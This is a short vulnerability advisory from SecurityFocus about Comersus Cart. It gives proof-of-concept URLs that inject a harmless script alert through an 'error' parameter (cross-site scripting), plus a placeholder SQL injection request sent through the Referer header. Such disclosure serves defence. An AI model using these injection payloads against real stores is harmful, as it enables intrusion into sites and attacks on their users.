Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Comersus Cart Multiple Vulnerabilities

No exploit is required for any of the issues.

The following proof of concepts are available for the cross-site scripting issue:
http://www.example.com/comersus/backofficelite/comersus_supportError.asp?error=<script>alert('hi%20mum');</script>
http://www.example.com/comersus/backofficelite/comersus_backofficelite_supportError.asp?error=<script>alert('hi%20mum');</script>

The following proof of concept is available for the SQL injection issue:
GET /comersus/store/default.asp HTTP/1.1
Referer: <SQLCODE HERE>







 

Privacy Statement
Copyright 2009, SecurityFocus